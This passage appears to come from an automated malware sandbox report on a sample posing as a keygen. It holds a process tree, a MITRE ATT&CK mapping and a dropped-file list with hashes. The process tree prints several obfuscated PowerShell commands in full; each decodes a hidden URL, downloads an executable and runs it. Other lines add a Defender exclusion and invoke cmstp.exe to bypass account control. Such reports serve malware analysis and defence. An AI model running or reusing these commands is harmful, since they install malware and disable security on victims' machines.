                      • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                        "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                        10⤵
                        • Executes dropped EXE
                        PID:1428
                      • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                        "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                        10⤵
                        • Executes dropped EXE
                        PID:2532
                      • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                        "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                        10⤵
                        • Executes dropped EXE
                        PID:2744
                  • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                    8⤵
                    • Executes dropped EXE
                    PID:2216
                  • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                    8⤵
                    • Executes dropped EXE
                    PID:1956
                  • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                    8⤵
                    • Executes dropped EXE
                    PID:1872
                  • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                    8⤵
                    • Executes dropped EXE
                    PID:2476
                  • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                    8⤵
                    • Executes dropped EXE
                    PID:1040
                  • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                    8⤵
                    • Executes dropped EXE
                    PID:1520
                  • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                    8⤵
                    • Executes dropped EXE
                    PID:552
                  • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                    8⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Checks processor information in registry
                    PID:872
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\System32\cmd.exe" /c taskkill /pid 872 & erase C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe & RD /S /Q C:\\ProgramData\\658808770004936\\* & exit
                      9⤵
                        PID:1496
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /pid 872
                          10⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1616
                • C:\Users\Public\dgt.exe
                  "C:\Users\Public\dgt.exe"
                  6⤵
                  • Executes dropped EXE
                  PID:2576
                • C:\Users\Public\dgt.exe
                  "C:\Users\Public\dgt.exe"
                  6⤵
                  • Executes dropped EXE
                  PID:588
                • C:\Users\Public\dgt.exe
                  "C:\Users\Public\dgt.exe"
                  6⤵
                  • Executes dropped EXE
                  PID:2560
          • C:\Windows\SysWOW64\mshta.exe
            "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\E2D0.tmp\b1.hta"
            3⤵
            • Modifies Internet Explorer settings
            • Suspicious use of WriteProcessMemory
            PID:824
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ftdrmoulpbhgsc $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;ftdrmoulpbhgsc rfmngajuyepx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rfmngajuyepx;ftdrmoulpbhgsc hnjmzobgr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3Bkc2hjanZudi51Zy96eGN2Yi5leGU=';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);hnjmzobgr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
              4⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1908
          • C:\Windows\SysWOW64\timeout.exe
            timeout 2
            3⤵
            • Delays execution with timeout.exe
            PID:1584
          • C:\Windows\SysWOW64\mshta.exe
            "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\E2D0.tmp\ba.hta"
            3⤵
            • Modifies Internet Explorer settings
            • Suspicious use of WriteProcessMemory
            PID:952
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL vfudzcotabjeq $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;vfudzcotabjeq urdjneqmx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|urdjneqmx;vfudzcotabjeq wuirkcyfmgjql $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKRA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);wuirkcyfmgjql $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
              4⤵
              • Blocklisted process makes network request
              • Loads dropped DLL
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1092
              • C:\Users\Public\nmf.exe
                "C:\Users\Public\nmf.exe"
                5⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of SetThreadContext
                • Suspicious behavior: MapViewOfSection
                • Suspicious use of SetWindowsHookEx
                PID:2448
                • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                  "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                  6⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of SetThreadContext
                  • Suspicious behavior: MapViewOfSection
                  • Suspicious use of SetWindowsHookEx
                  PID:2540
                  • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                    "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                    7⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Checks processor information in registry
                    PID:2648
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\System32\cmd.exe" /c taskkill /pid 2648 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\214020626051397\\* & exit
                      8⤵
                        PID:2564
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /pid 2648
                          9⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1688
                  • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                    "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                    6⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of SetThreadContext
                    • Suspicious behavior: MapViewOfSection
                    • Suspicious use of SetWindowsHookEx
                    PID:2580
                    • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                      "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                      7⤵
                      • Executes dropped EXE
                      PID:2760
                  • C:\Users\Public\nmf.exe
                    "C:\Users\Public\nmf.exe"
                    6⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Drops desktop.ini file(s)
                    • Modifies system certificate store
                    PID:2620
                    • C:\Users\Admin\AppData\Local\Temp\j7ajDwAuis.exe
                      "C:\Users\Admin\AppData\Local\Temp\j7ajDwAuis.exe"
                      7⤵
                      • Executes dropped EXE
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2252
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
                        "Powershell" Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Local\Temp\j7ajDwAuis.exe"'
                        8⤵
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1304
                    • C:\Users\Admin\AppData\Local\Temp\yaykE2jv2g.exe
                      "C:\Users\Admin\AppData\Local\Temp\yaykE2jv2g.exe"
                      7⤵
                      • Executes dropped EXE
                      PID:2668
                      • C:\Windows\SysWOW64\Notepad.exe
                        "C:\Windows\System32\Notepad.exe"
                        8⤵
                          PID:1224
                      • C:\Users\Admin\AppData\Local\Temp\ufeP9Abbpx.exe
                        "C:\Users\Admin\AppData\Local\Temp\ufeP9Abbpx.exe"
                        7⤵
                        • Executes dropped EXE
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of SetWindowsHookEx
                        PID:2512
                        • \??\c:\windows\SysWOW64\cmstp.exe
                          "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\osh1ob0m.inf
                          8⤵
                            PID:2060
                        • C:\Users\Admin\AppData\Local\Temp\nkxy8FTNOc.exe
                          "C:\Users\Admin\AppData\Local\Temp\nkxy8FTNOc.exe"
                          7⤵
                          • Executes dropped EXE
                          • Windows security modification
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2912
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            "powershell" Get-MpPreference -verbose
                            8⤵
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2836
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\nmf.exe"
                          7⤵
                            PID:2916
                            • C:\Windows\SysWOW64\timeout.exe
                              timeout /T 10 /NOBREAK
                              8⤵
                              • Delays execution with timeout.exe
                              PID:3052
                  • C:\Windows\SysWOW64\mshta.exe
                    "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\E2D0.tmp\ba1.hta"
                    3⤵
                    • Modifies Internet Explorer settings
                    • Suspicious use of WriteProcessMemory
                    PID:924
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL wvroy $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;wvroy bwskyfgqtipu $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bwskyfgqtipu;wvroy shlevpgb $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3JiY3h2bmIudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);shlevpgb $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                      4⤵
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2012

              Network

              MITRE ATT&CK Matrix ATT&CK v6

              Persistence

              Modify Existing Service

              1
              T1031

              Defense Evasion

              Modify Registry

              4
              T1112

              Disabling Security Tools

              2
              T1089

              Install Root Certificate

              1
              T1130

              Credential Access

              Credentials in Files

              3
              T1081

              Discovery

              Query Registry

              2
              T1012

              System Information Discovery

              2
              T1082

              Collection

              Data from Local System

              3
              T1005

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\ProgramData\MSVCP140.dll
              • C:\ProgramData\freebl3.dll
              • C:\ProgramData\freebl3.dll
              • C:\ProgramData\mozglue.dll
              • C:\ProgramData\mozglue.dll
              • C:\ProgramData\msvcp140.dll
              • C:\ProgramData\nss3.dll
                MD5

                bfac4e3c5908856ba17d41edcd455a51

                SHA1

                8eec7e888767aa9e4cca8ff246eb2aacb9170428

                SHA256

                e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                SHA512

                2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

              • C:\ProgramData\nss3.dll
                MD5

                bfac4e3c5908856ba17d41edcd455a51

                SHA1

                8eec7e888767aa9e4cca8ff246eb2aacb9170428

                SHA256

                e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                SHA512

                2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

              • C:\ProgramData\softokn3.dll
              • C:\ProgramData\sqlite3.dll
              • C:\ProgramData\sqlite3.dll
              • C:\ProgramData\vcruntime140.dll
              • C:\ProgramData\vcruntime140.dll
              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1a1733a9-c78a-41f9-ba49-7e78bc3e775b
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_268e2092-b74d-4105-8be9-ed53432f59f4
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3f7be1a4-49ae-48ea-8c13-3d08db3297a3
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_478c05f3-b801-4912-91bd-47646e127596
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4fd4a7fe-82f5-41e4-888c-1b7eac83ece7
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_591002d9-ff12-48aa-9104-2ecc086985ae
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_5e141e43-2daf-4a52-ae1d-a583d1e99e4c
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_5f181f6b-f579-43c4-b3ce-9aae00b4c1fb
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_62f45007-4c4b-48d6-9fd9-aff61022eb03
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a2ebb337-3027-47ef-8098-8d2e9f7615cf
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ca37ad88-4ce8-48e7-a2ed-ec10658dba29
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e10aa6dc-f3ff-45e4-9eec-4fef42847693
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e1dd9aab-0fd1-4532-ba7f-00569c2741ef
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              • C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs
              • C:\Users\Admin\AppData\Local\Temp\E2D0.tmp\Keygen.exe
              • C:\Users\Admin\AppData\Local\Temp\E2D0.tmp\Keygen.exe
              • C:\Users\Admin\AppData\Local\Temp\E2D0.tmp\b.hta
              • C:\Users\Admin\AppData\Local\Temp\E2D0.tmp\b1.hta
              • C:\Users\Admin\AppData\Local\Temp\E2D0.tmp\ba.hta
              • C:\Users\Admin\AppData\Local\Temp\E2D0.tmp\ba1.hta
              • C:\Users\Admin\AppData\Local\Temp\E2D0.tmp\m.hta
              • C:\Users\Admin\AppData\Local\Temp\E2D0.tmp\m1.hta
              • C:\Users\Admin\AppData\Local\Temp\E2D0.tmp\start.bat
              • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
              • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
              • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
              • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
              • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
              • C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs
              • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
              • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
              • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
              • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
              • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
              • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
              • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
              • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
              • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
              • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
              • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
              • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
              • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
              • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
              • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
              • C:\Users\Admin\AppData\Local\Temp\j7ajDwAuis.exe
              • C:\Users\Admin\AppData\Local\Temp\j7ajDwAuis.exe
              • C:\Users\Admin\AppData\Local\Temp\nkxy8FTNOc.exe
              • C:\Users\Admin\AppData\Local\Temp\nkxy8FTNOc.exe
              • C:\Users\Admin\AppData\Local\Temp\ufeP9Abbpx.exe
              • C:\Users\Admin\AppData\Local\Temp\ufeP9Abbpx.exe
              • C:\Users\Admin\AppData\Local\Temp\yaykE2jv2g.exe
                MD5

                013db621a3351e3fb049efd2ccad79ff

                SHA1

                a23394ea54dbc5342a77938a2c285ee616185560

                SHA256

                df1bda6183201e4dc1bc6f6425361a565413e71f09da0648b0c82b39786af27a

                SHA512

                1bf6d076677b234c9da7cbc720fc64632b587b4223b5370a7ca3d53c4d59fa59ef117957b1646c92ba80dac332f6c1c313060d35de7236b2585e5bed00d79229

              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
              • C:\Users\Public\dgt.exe
              • C:\Users\Public\dgt.exe
              • C:\Users\Public\dgt.exe
              • C:\Users\Public\dgt.exe
              • C:\Users\Public\dgt.exe
              • C:\Users\Public\nmf.exe
              • C:\Users\Public\nmf.exe
              • C:\Users\Public\nmf.exe
              • C:\Users\Public\yad.exe
              • C:\Users\Public\yad.exe
              • C:\Users\Public\yad.exe
              • C:\Windows\temp\osh1ob0m.inf
              • \??\PIPE\srvsvc
              • \??\PIPE\srvsvc
              • \ProgramData\mozglue.dll
              • \ProgramData\mozglue.dll
              • \ProgramData\mozglue.dll
              • \ProgramData\msvcp140.dll
              • \ProgramData\msvcp140.dll
              • \ProgramData\msvcp140.dll
              • \ProgramData\nss3.dll
                MD5

                bfac4e3c5908856ba17d41edcd455a51

                SHA1

                8eec7e888767aa9e4cca8ff246eb2aacb9170428

                SHA256

                e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                SHA512

                2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

              • \ProgramData\nss3.dll
                MD5

                bfac4e3c5908856ba17d41edcd455a51

                SHA1

                8eec7e888767aa9e4cca8ff246eb2aacb9170428

                SHA256

                e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                SHA512

                2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

              • \ProgramData\nss3.dll
                MD5

                bfac4e3c5908856ba17d41edcd455a51

                SHA1

                8eec7e888767aa9e4cca8ff246eb2aacb9170428

                SHA256

                e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                SHA512

                2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

              • \ProgramData\sqlite3.dll
              • \ProgramData\sqlite3.dll
              • \ProgramData\sqlite3.dll
              • \ProgramData\vcruntime140.dll
              • \ProgramData\vcruntime140.dll
              • \ProgramData\vcruntime140.dll
              • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
              • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
              • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\mozglue.dll
              • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\msvcp140.dll
              • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\nss3.dll
                MD5

                02cc7b8ee30056d5912de54f1bdfc219

                SHA1

                a6923da95705fb81e368ae48f93d28522ef552fb

                SHA256

                1989526553fd1e1e49b0fea8036822ca062d3d39c4cab4a37846173d0f1753d5

                SHA512

                0d5dfcf4fb19b27246fa799e339d67cd1b494427783f379267fb2d10d615ffb734711bab2c515062c078f990a44a36f2d15859b1dacd4143dcc35b5c0cee0ef5

              • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\softokn3.dll
              • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\vcruntime140.dll
              • \Users\Admin\AppData\LocalLow\sqlite3.dll
              • \Users\Admin\AppData\Local\Temp\E2D0.tmp\Keygen.exe
              • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
              • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
              • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
              • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
              • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
              • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
              • \Users\Admin\AppData\Local\Temp\axcsdfa.exe
              • \Users\Admin\AppData\Local\Temp\axcsdfa.exe
              • \Users\Admin\AppData\Local\Temp\axcsdfa.exe
